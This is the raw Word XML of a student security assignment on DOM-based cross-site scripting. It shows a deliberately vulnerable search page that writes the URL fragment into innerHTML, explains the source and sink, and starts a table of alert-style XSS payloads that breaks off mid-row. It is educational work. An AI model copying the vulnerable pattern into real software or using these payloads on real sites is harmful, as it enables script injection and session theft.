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65D8" w14:textId="77777777" w:rsidR="00B91DB1" w:rsidRDefault="00B91DB1" w:rsidP="00B91DB1">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>DOM-Based Cross-Site Scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C133FB" w14:textId="1E9BADC1" w:rsidR="00BC17F6" w:rsidRDefault="00B91DB1">
      <w:r>
        <w:t>ISEC3004 Group Assignment – Group 35</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C1AB2D" w14:textId="51AE9E63" w:rsidR="00B91DB1" w:rsidRDefault="00B91DB1">
      <w:r>
        <w:t>Student Name: Dang Thanh Son, ID:22957081</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E75E595" w14:textId="77777777" w:rsidR="00B91DB1" w:rsidRDefault="00B91DB1"/>
    <w:p w14:paraId="62AD3AC8" w14:textId="11306EF6" w:rsidR="00B91DB1" w:rsidRPr="0079772A" w:rsidRDefault="00B91DB1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="156082" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0079772A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="156082" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1.OverView</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAD7165" w14:textId="55EDE760" w:rsidR="00B91DB1" w:rsidRDefault="00B91DB1"/>
    <w:p w14:paraId="75EDEAC2" w14:textId="22DF7DD6" w:rsidR="00B91DB1" w:rsidRDefault="00B91DB1">
      <w:r>
        <w:t>This section covers DOM-based Cross-Site Scripting, one of the two vulnerabilities chosen for our group. A vulnerable “Product Search” Page was built, exploited to steal a victim’s session cookie, detected using browser developer tools and an intercepting proxy, and then patched. This document is a walkthrough for each stage, the code, exploit and how the attack was detected and traced, the fix and why the vulnerability matters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436D0B1C" w14:textId="77777777" w:rsidR="00B91DB1" w:rsidRDefault="00B91DB1"/>
    <w:p w14:paraId="2021F3FC" w14:textId="7E5B9981" w:rsidR="00B91DB1" w:rsidRPr="0079772A" w:rsidRDefault="00B91DB1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="156082" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0079772A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="156082" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2.Vul Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008E561B" w14:textId="77777777" w:rsidR="00B91DB1" w:rsidRDefault="00B91DB1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="156082" w:themeColor="accent1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19D56192" w14:textId="1DDE41F9" w:rsidR="00B91DB1" w:rsidRDefault="00B91DB1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">The vulnerable page is a simple product search box. It reads a search term from the URL fragment and displays it back to the user. The term is inserted into the page using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> which causes the browser to parse it as HTML rather than just plain text. (basically, trick the page into thinking the inserted term is a HTML code)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589919E6" w14:textId="77777777" w:rsidR="00B91DB1" w:rsidRDefault="00B91DB1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B91DB1" w14:paraId="09467676" w14:textId="77777777" w:rsidTr="00B91DB1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5970EA56" w14:textId="77777777" w:rsidR="00B91DB1" w:rsidRDefault="00B91DB1" w:rsidP="00B91DB1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>// vulnerable.html</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F9AB8B8" w14:textId="77777777" w:rsidR="00B91DB1" w:rsidRDefault="00B91DB1" w:rsidP="00B91DB1">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>window.onload</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> = function () {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DAD7A2E" w14:textId="6A07D6D3" w:rsidR="00B91DB1" w:rsidRDefault="00B91DB1" w:rsidP="00B91DB1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  const params = new </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>URLSearchParams</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location.hash.slice</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>(1));</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="333522FC" w14:textId="77777777" w:rsidR="00B91DB1" w:rsidRDefault="00B91DB1" w:rsidP="00B91DB1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  const term = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>params.get</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>('q');</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="188BE328" w14:textId="77777777" w:rsidR="00B91DB1" w:rsidRDefault="00B91DB1" w:rsidP="00B91DB1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  if (term) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4996458E" w14:textId="77777777" w:rsidR="00B91DB1" w:rsidRDefault="00B91DB1" w:rsidP="00B91DB1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">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searchBox</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>').value = term;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24F73221" w14:textId="77777777" w:rsidR="00B91DB1" w:rsidRDefault="00B91DB1" w:rsidP="00B91DB1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>renderResults</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>(term);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A4AD1CA" w14:textId="77777777" w:rsidR="00B91DB1" w:rsidRDefault="00B91DB1" w:rsidP="00B91DB1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="635EF5E4" w14:textId="77777777" w:rsidR="00B91DB1" w:rsidRDefault="00B91DB1" w:rsidP="00B91DB1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>};</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D0C1EEB" w14:textId="77777777" w:rsidR="00B91DB1" w:rsidRDefault="00B91DB1" w:rsidP="00B91DB1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57A630A5" w14:textId="77777777" w:rsidR="003C4509" w:rsidRDefault="00B91DB1" w:rsidP="00B91DB1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">function </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>renderResults</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>(term) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="433D8446" w14:textId="4BDF7C09" w:rsidR="00B91DB1" w:rsidRDefault="00B91DB1" w:rsidP="00B91DB1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">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('results').</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>innerHTML</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> =</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A083FBB" w14:textId="77777777" w:rsidR="00B91DB1" w:rsidRDefault="00B91DB1" w:rsidP="00B91DB1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    "&lt;p&gt;Showing results for: " + term + "&lt;/p&gt;&lt;p&gt;0 products found.&lt;/p&gt;";</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21425869" w14:textId="1981BBA8" w:rsidR="00B91DB1" w:rsidRDefault="00B91DB1" w:rsidP="00B91DB1">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3F63A938" w14:textId="77777777" w:rsidR="00B91DB1" w:rsidRDefault="00B91DB1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="318D9280" w14:textId="2F0F7C97" w:rsidR="00B91DB1" w:rsidRDefault="00B91DB1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>This is the vulnerable part of the code.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:br/>
        <w:t>To explain it:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:br/>
        <w:t>The first part (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>window.onload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>): when the page loads, it grabs whatever after the # in the URL and pulls out the q value. If there’s something there, it puts it in the search box and shows it on the page.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:br/>
        <w:t>The second part (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>renderResults</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">): this takes that text and shoves it directly into the page’s HTML. The problem is it doesn’t check what’s inside the text first, if it’s actual HTML Code (not just words), the browser will run it instead of just displaying it as text. That’s the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>vul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> part.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E404A58" w14:textId="77777777" w:rsidR="00B91DB1" w:rsidRDefault="00B91DB1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37CF4C6C" w14:textId="6F394AB1" w:rsidR="00B91DB1" w:rsidRDefault="003C4509">
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Source: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>location.hash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> – the part of the URL after “#”, which is fully attacker-controlled and is never transmitted to the server. (Everyone can put anything here since the browsers never send that part to the server, the website’s backend never even sees its to put it in simple terms)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BA5648" w14:textId="77777777" w:rsidR="003C4509" w:rsidRDefault="003C4509"/>
    <w:p w14:paraId="28903622" w14:textId="5CAE186C" w:rsidR="003C4509" w:rsidRDefault="003C4509">
      <w:r>
        <w:t xml:space="preserve">Sink: Where that data ends up and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cuses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> damage. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> takes a string and tells the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>borwser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> “render this as real HTML” so if the string </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cotains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> like &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onerror</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=…&gt;, the browser builds that element and runs it codes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D96D64" w14:textId="77777777" w:rsidR="003C4509" w:rsidRDefault="003C4509"/>
    <w:p w14:paraId="74E6CBA0" w14:textId="62A69A0F" w:rsidR="003C4509" w:rsidRDefault="003C4509">
      <w:r>
        <w:t xml:space="preserve">The problem is nothing sits between grabbing the URL text and dumping it into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to check if it’s clean first. </w:t>
      </w:r>
      <w:r w:rsidR="004D08E1">
        <w:t>So,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the browser has no way to tell if the user typed a normal line or an actual executable code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2B3546" w14:textId="77777777" w:rsidR="003C4509" w:rsidRDefault="003C4509">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62C1F0F5" w14:textId="5C4E378A" w:rsidR="003C4509" w:rsidRPr="0079772A" w:rsidRDefault="003C4509">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="156082" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0079772A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="156082" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3.Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAAFF6A" w14:textId="77777777" w:rsidR="003C4509" w:rsidRDefault="003C4509">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="538"/>
        <w:gridCol w:w="7811"/>
        <w:gridCol w:w="1001"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F35EF5" w14:paraId="52250A6C" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0047D799" w14:textId="5533361C" w:rsidR="00F35EF5" w:rsidRDefault="00F35EF5">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Num</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F26B4F0" w14:textId="197BD9EB" w:rsidR="00F35EF5" w:rsidRDefault="00F35EF5">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>Payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6AF84968" w14:textId="78004759" w:rsidR="00F35EF5" w:rsidRDefault="00F35EF5">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>What it does</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F35EF5" w14:paraId="69BF2E07" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="720DC3F2" w14:textId="28AFB208" w:rsidR="00F35EF5" w:rsidRDefault="00F35EF5">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15231EA4" w14:textId="6D877DBB" w:rsidR="00F35EF5" w:rsidRDefault="00F35EF5">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>&lt;script&gt;alert(1)&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F5B39A3" w14:textId="687C2E38" w:rsidR="00F35EF5" w:rsidRDefault="00F35EF5">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t xml:space="preserve">Does not execute, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>innerHTML</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t xml:space="preserve"> does not run injected &lt;script&gt; tags.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F35EF5" w14:paraId="71137BA7" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6655C0A5" w14:textId="774D98EC" w:rsidR="00F35EF5" w:rsidRDefault="00F35EF5">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02CC6EAF" w14:textId="32BCC603" w:rsidR="00F35EF5" w:rsidRDefault="00F35EF5">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>&lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>img</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>src</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t xml:space="preserve">=x </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>onerror</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>=alert(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
